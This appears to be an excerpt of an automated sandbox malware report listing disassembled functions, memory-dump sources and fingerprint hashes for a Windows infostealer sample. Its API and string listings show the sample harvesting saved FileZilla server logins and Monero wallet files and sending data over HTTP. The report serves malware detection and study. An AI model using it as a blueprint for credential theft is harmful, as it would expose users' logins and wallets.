                              Function 00BC8032 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: pK5
                              • API String ID: 0-3523557807
                              • Opcode ID: 3e5f3908b98dd88afd54d8fe325b8491ae7dd0fcc8005661a40873088cdd1693
                              • Instruction ID: afe8a0acdf9ff5a39d538849155c1775dc426643b9508a8f3306897cbbdc2aae
                              • Opcode Fuzzy Hash: 3e5f3908b98dd88afd54d8fe325b8491ae7dd0fcc8005661a40873088cdd1693
                              • Instruction Fuzzy Hash: F15118F3E086209FE3046D69DC8576AB7E5EF94320F1B853DDAD893380EA79484487D2
                              Function 00BEAB2F Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: dHB
                              • API String ID: 0-3280201581
                              • Opcode ID: 234dcc6cb08face2cf22796aefc0055cf7e3b0f880731cfc63718b9fcf56e8e2
                              • Instruction ID: 3f65ab1b0f58168a855d55e793310684c01ae0dbda8f43b5f4188e661d7ad339
                              • Opcode Fuzzy Hash: 234dcc6cb08face2cf22796aefc0055cf7e3b0f880731cfc63718b9fcf56e8e2
                              • Instruction Fuzzy Hash: 534137B39086109FD3086E29DC5577AF7E6EBC4760F168A3DE9C487748DA35584087C2
                              Function 00C2CFD0 Relevance: .2, Instructions: 227COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35ae6b675a2d3ca2f779fdfefa113ed81860d8472646319973883c72462af514
                              • Instruction ID: 20d20034141a1cc80637fabcdb7750a34ddd67a8b97d9de7bdc7c09fef2cd337
                              • Opcode Fuzzy Hash: 35ae6b675a2d3ca2f779fdfefa113ed81860d8472646319973883c72462af514
                              • Instruction Fuzzy Hash: 246124F3E087145BE3049E29EC8573AB7D5EB94720F1A863DDEC897384EA795C058682
                              Function 00BFD134 Relevance: .2, Instructions: 221COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cd1827fcc110bf1e512ee3943b4e4db49c7c5fad1d8be47271543d1b5a3cf926
                              • Instruction ID: 5d3b1a59fe0fb9fad545e69a6ccc6c342474b0f83e53d6bd366d8204b2ac2de1
                              • Opcode Fuzzy Hash: cd1827fcc110bf1e512ee3943b4e4db49c7c5fad1d8be47271543d1b5a3cf926
                              • Instruction Fuzzy Hash: CF6115B35083049FE308AE39DC9563AFBE8EF54720F160A3DEAC587740E63658458653
                              Function 00CCC34D Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0702c944c6a05af4f8fab1510ed2acd1a6d7a9bfee076e6737cfe4e66afe491c
                              • Instruction ID: 0ecc4596bf137ab56c8eab73bbfc209e08c2ded4052d50e0718b0b75944c203b
                              • Opcode Fuzzy Hash: 0702c944c6a05af4f8fab1510ed2acd1a6d7a9bfee076e6737cfe4e66afe491c
                              • Instruction Fuzzy Hash: E74117B3A181148FF304AA2DEC957BBB2D6EB94311F1A853DDAD9D3344E93A5C018786
                              Function 00BA93C8 Relevance: .1, Instructions: 98COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d3414a98bc7ef2515c4364e616eb216fb8b1c02de31aeb4338a4b80ce4fdb9f
                              • Instruction ID: fa38d0a1a477be9fd230fc5b2e0b4b0ddb74c1e6bd5d81126d1f4eb55dc5dc3e
                              • Opcode Fuzzy Hash: 8d3414a98bc7ef2515c4364e616eb216fb8b1c02de31aeb4338a4b80ce4fdb9f
                              • Instruction Fuzzy Hash: 883132F39087004BE3446E39EC42366B7E6EFA5330F2B063DC5C583384EA3A98058682
                              Function 00949750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00940250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00950DBA,00950DB7,00950DB6,00950DB3), ref: 00940362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00940369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00940385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 009403CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 009403DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00940419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00940463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00940562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00940571
                              • lstrcat.KERNEL32(?,url: ), ref: 00940580
                              • lstrcat.KERNEL32(?,00000000), ref: 00940593
                              • lstrcat.KERNEL32(?,00951678), ref: 009405A2
                              • lstrcat.KERNEL32(?,00000000), ref: 009405B5
                              • lstrcat.KERNEL32(?,0095167C), ref: 009405C4
                              • lstrcat.KERNEL32(?,login: ), ref: 009405D3
                              • lstrcat.KERNEL32(?,00000000), ref: 009405E6
                              • lstrcat.KERNEL32(?,00951688), ref: 009405F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00940604
                              • lstrcat.KERNEL32(?,00000000), ref: 00940617
                              • lstrcat.KERNEL32(?,00951698), ref: 00940626
                              • lstrcat.KERNEL32(?,0095169C), ref: 00940635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 17a4748e8cda58bb2e56c8a22d01f8bcda0e0513b3313eb2b44de26dd77b62a5
                              • Instruction ID: a7686020a818b7cb1051fe830f54f9aacec7478803d5c165842444353e01ee2c
                              • Opcode Fuzzy Hash: 17a4748e8cda58bb2e56c8a22d01f8bcda0e0513b3313eb2b44de26dd77b62a5
                              • Instruction Fuzzy Hash: 22D14D72940208ABDB04EBF0DD96FEE7339EFD4305F404518F506A7191EE34AA4ACB62
                              Function 00935960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009359F8
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00935A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00935B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,010FE2E8,00000000,?,010F9BC0,00000000,?,00951A1C), ref: 00935E71
                              • lstrlen.KERNEL32(00000000), ref: 00935E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00935E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00935E9A
                              • lstrlen.KERNEL32(00000000), ref: 00935EAF
                              • lstrlen.KERNEL32(00000000), ref: 00935ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00935EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00935F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00935F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00935F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00935FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00935FBD
                              • HttpOpenRequestA.WININET(00000000,010FE3B8,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00935BF8
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • InternetCloseHandle.WININET(00000000), ref: 00935FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 19888ee2c3cd09f54fecd9c5515d71355c6eca340809100636bf702c6aa18b8c
                              • Instruction ID: 78bf730a098ef71d435d8e70575710ad1ea2e00735334775681b534b99166ba2
                              • Opcode Fuzzy Hash: 19888ee2c3cd09f54fecd9c5515d71355c6eca340809100636bf702c6aa18b8c
                              • Instruction Fuzzy Hash: 1112ED72860118AAEB15EBA0DC96FEEB378FF94704F504199F10A63191EF702E49CF65
                              Function 0093CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093CF83
